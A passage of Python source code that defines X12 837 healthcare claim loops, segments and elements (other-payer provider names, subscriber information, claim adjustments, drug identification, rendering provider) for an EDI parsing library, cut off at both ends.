), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", 
data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Referring Provider Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330D = Loop( "2330D", Properties( desc="Other Payer Rendering Provider", looptype="", position="3650", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Rendering Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["82"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( 
desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Rendering Provider Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330E = Loop( "2330E", Properties( 
desc="Other Payer Service Facility Location", looptype="", position="4650", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Service Facility Location", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["77"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Service Facility Location Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( 
desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330F = Loop( "2330F", Properties( desc="Other Payer Supervising Provider", looptype="", position="5650", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Supervising Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DQ"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", 
req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Supervising Provider Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330G = Loop( "2330G", Properties( desc="Other Payer Billing Provider", looptype="", position="6350", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Billing Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["85"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name 
Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Billing Provider Secondary Identification", position="3550", repeat="2", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2320 = Loop( "2320", Properties( desc="Other Subscriber Information", looptype="", position="2900", repeat="10", req_sit="S", ), Segment( "SBR", Properties( desc="Other Subscriber Information", position="2900", repeat="1", req_sit="R", syntax="", ), Element( "SBR01", Properties( desc="Payer Responsibility Sequence Number Code", req_sit="R", data_type=("ID", "1", "1"), position=1, codes=["A", "B", "C", "D", "E", "F", "G", "H", "P", "S", "T", 
"U"], ), ), Element( "SBR02", Properties( desc="Individual Relationship Code", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["01", "18", "19", "20", "21", "39", "40", "53", "G8"], ), ), Element( "SBR03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "SBR04", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=4, codes=[], ), ), Element( "SBR05", Properties( desc="Insurance Type Code", req_sit="S", data_type=("ID", "1", "3"), position=5, codes=["12", "13", "14", "15", "16", "41", "42", "43", "47"], ), ), Element( "SBR06", Properties( desc="Coordination of Benefits Code", req_sit="N", data_type=("ID", "1", "1"), position=6, codes=[], ), ), Element( "SBR07", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=7, codes=[], ), ), Element( "SBR08", Properties( desc="Employment Status Code", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "SBR09", Properties( desc="Claim Filing Indicator Code", req_sit="S", data_type=("ID", "1", "2"), position=9, codes=[ "11", "12", "13", "14", "15", "16", "17", "AM", "BL", "CH", "CI", "DS", "FI", "HM", "LM", "MA", "MB", "MC", "OF", "TV", "VA", "WC", "ZZ", ], ), ), ), Segment( "CAS", Properties( desc="Claim Level Adjustments", position="2950", repeat="5", req_sit="S", syntax="L050607 C0605 C0705 L080910 C0908 C1008 L111213 C1211 C1311 L141516 C1514 C1614 L171819 C1817 C1917", ), Element( "CAS01", Properties( desc="Claim Adjustment Group Code", req_sit="R", data_type=("ID", "1", "2"), position=1, codes=["CO", "CR", "OA", "PI", "PR"], ), ), Element( "CAS02", Properties( desc="Claim Adjustment Reason Code", req_sit="R", data_type=("ID", "1", "5"), position=2, codes=[], ), ), Element( "CAS03", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "CAS04", Properties( desc="Quantity", 
req_sit="S", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "CAS05", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=5, codes=[], ), ), Element( "CAS06", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=6, codes=[], ), ), Element( "CAS07", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CAS08", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=8, codes=[], ), ), Element( "CAS09", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=9, codes=[], ), ), Element( "CAS10", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=10, codes=[], ), ), Element( "CAS11", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=11, codes=[], ), ), Element( "CAS12", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=12, codes=[], ), ), Element( "CAS13", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=13, codes=[], ), ), Element( "CAS14", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=14, codes=[], ), ), Element( "CAS15", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=15, codes=[], ), ), Element( "CAS16", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=16, codes=[], ), ), Element( "CAS17", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=17, codes=[], ), ), Element( "CAS18", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=18, codes=[], ), ), Element( "CAS19", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=19, codes=[], ), ), ), Segment( "AMT", Properties( 
desc="Coordination of Benefits (COB) Payer Paid Amount", position="3000", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["D"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Coordination of Benefits (COB) Total Non-Covered Amount", position="3000", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["A8"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Remaining Patient Liability", position="3000", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["EAF"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "OI", Properties( desc="Other Insurance Coverage Information", position="3100", repeat="1", req_sit="R", syntax="", ), Element( "OI01", Properties( desc="Claim Filing Indicator Code", req_sit="N", data_type=("ID", "1", "2"), position=1, codes=[], ), ), Element( "OI02", Properties( desc="Claim Submission Reason Code", req_sit="N", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "OI03", Properties( desc="Yes/No Condition or 
Response Code", req_sit="R", data_type=("ID", "1", "1"), position=3, codes=["N", "W", "Y"], ), ), Element( "OI04", Properties( desc="Patient Signature Source Code", req_sit="S", data_type=("ID", "1", "1"), position=4, codes=["P"], ), ), Element( "OI05", Properties( desc="Provider Agreement Code", req_sit="N", data_type=("ID", "1", "1"), position=5, codes=[], ), ), Element( "OI06", Properties( desc="Release of Information Code", req_sit="R", data_type=("ID", "1", "1"), position=6, codes=["I", "Y"], ), ), ), Segment( "MOA", Properties( desc="Outpatient Adjudication Information", position="3200", repeat="1", req_sit="S", syntax="", ), Element( "MOA01", Properties( desc="Percentage as Decimal", req_sit="S", data_type=("R", "1", "10"), position=1, codes=[], ), ), Element( "MOA02", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "MOA03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "MOA04", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "MOA05", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=5, codes=[], ), ), Element( "MOA06", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=6, codes=[], ), ), Element( "MOA07", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=7, codes=[], ), ), Element( "MOA08", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=8, codes=[], ), ), Element( "MOA09", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=9, codes=[], ), ), ), parsed_837_2330A, parsed_837_2330B, parsed_837_2330C, parsed_837_2330D, parsed_837_2330E, parsed_837_2330F, parsed_837_2330G, ) parsed_837_2410 = Loop( "2410", Properties( desc="Drug 
Identification", looptype="", position="4940", repeat="1", req_sit="S", ), Segment( "LIN", Properties( desc="Drug Identification", position="4930", repeat="1", req_sit="R", syntax="P0405 P0607 P0809 P1011 P1213 P1415 P1617 P1819 P2021 P2223 P2425 P2627 P2829 P3031", ), Element( "LIN01", Properties( desc="Assigned Identification", req_sit="N", data_type=("AN", "1", "20"), position=1, codes=[], ), ), Element( "LIN02", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["EN", "EO", "HI", "N4", "ON", "UK", "UP"], ), ), Element( "LIN03", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=3, codes=[], ), ), Element( "LIN04", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Element( "LIN05", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=5, codes=[], ), ), Element( "LIN06", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=6, codes=[], ), ), Element( "LIN07", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), Element( "LIN08", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "LIN09", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=9, codes=[], ), ), Element( "LIN10", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "LIN11", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=11, codes=[], ), ), Element( "LIN12", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=12, codes=[], ), ), Element( "LIN13", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), 
position=13, codes=[], ), ), Element( "LIN14", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=14, codes=[], ), ), Element( "LIN15", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=15, codes=[], ), ), Element( "LIN16", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=16, codes=[], ), ), Element( "LIN17", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=17, codes=[], ), ), Element( "LIN18", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=18, codes=[], ), ), Element( "LIN19", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=19, codes=[], ), ), Element( "LIN20", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=20, codes=[], ), ), Element( "LIN21", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=21, codes=[], ), ), Element( "LIN22", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=22, codes=[], ), ), Element( "LIN23", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=23, codes=[], ), ), Element( "LIN24", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=24, codes=[], ), ), Element( "LIN25", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=25, codes=[], ), ), Element( "LIN26", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=26, codes=[], ), ), Element( "LIN27", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=27, codes=[], ), ), Element( "LIN28", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), 
position=28, codes=[], ), ), Element( "LIN29", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=29, codes=[], ), ), Element( "LIN30", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=30, codes=[], ), ), Element( "LIN31", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=31, codes=[], ), ), ), Segment( "CTP", Properties( desc="Drug Quantity", position="4940", repeat="1", req_sit="R", syntax="P0405 C0607 C0902 C1002 C1103", ), Element( "CTP01", Properties( desc="Class of Trade Code", req_sit="N", data_type=("ID", "2", "2"), position=1, codes=[], ), ), Element( "CTP02", Properties( desc="Price Identifier Code", req_sit="N", data_type=("ID", "3", "3"), position=2, codes=[], ), ), Element( "CTP03", Properties( desc="Unit Price", req_sit="N", data_type=("R", "1", "17"), position=3, codes=[], ), ), Element( "CTP04", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=4, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="R", seq="05", ), Element( "CTP05-01", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["F2", "GR", "ME", "ML", "UN"], ), ), Element( "CTP05-02", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=1, codes=[], ), ), Element( "CTP05-03", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=2, codes=[], ), ), Element( "CTP05-04", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=3, codes=[], ), ), Element( "CTP05-05", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "CTP05-06", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=5, codes=[], ), ), Element( "CTP05-07", Properties( 
desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=6, codes=[], ), ), Element( "CTP05-08", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CTP05-09", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=8, codes=[], ), ), Element( "CTP05-10", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "CTP05-11", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=10, codes=[], ), ), Element( "CTP05-12", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=11, codes=[], ), ), Element( "CTP05-13", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=12, codes=[], ), ), Element( "CTP05-14", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=13, codes=[], ), ), Element( "CTP05-15", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=14, codes=[], ), ), ), Element( "CTP06", Properties( desc="Price Multiplier Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), Element( "CTP07", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=7, codes=[], ), ), Element( "CTP08", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=8, codes=[], ), ), Element( "CTP09", Properties( desc="Basis of Unit Price Code", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "CTP10", Properties( desc="Condition Value", req_sit="N", data_type=("AN", "1", "10"), position=10, codes=[], ), ), Element( "CTP11", Properties( desc="Multiple Price Quantity", req_sit="N", data_type=("N0", "1", "2"), position=11, codes=[], ), ), ), Segment( "REF", Properties( desc="Prescription or Compound Drug Association Number", position="4950", 
repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["VY", "XZ"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2420A = Loop( "2420A", Properties( desc="Rendering Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Rendering Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["82"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( 
"NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "PRV", Properties( desc="Rendering Provider Specialty Information", position="5050", repeat="1", req_sit="S", syntax="P0203", ), Element( "PRV01", Properties( desc="Provider Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["PE"], ), ), Element( "PRV02", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["PXC"], ), ), Element( "PRV03", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "PRV04", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Composite( "C035", Properties( desc="Provider Specialty Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Element( "PRV06", Properties( desc="Provider Organization Code", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), ), Segment( "REF", Properties( desc="Rendering Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", 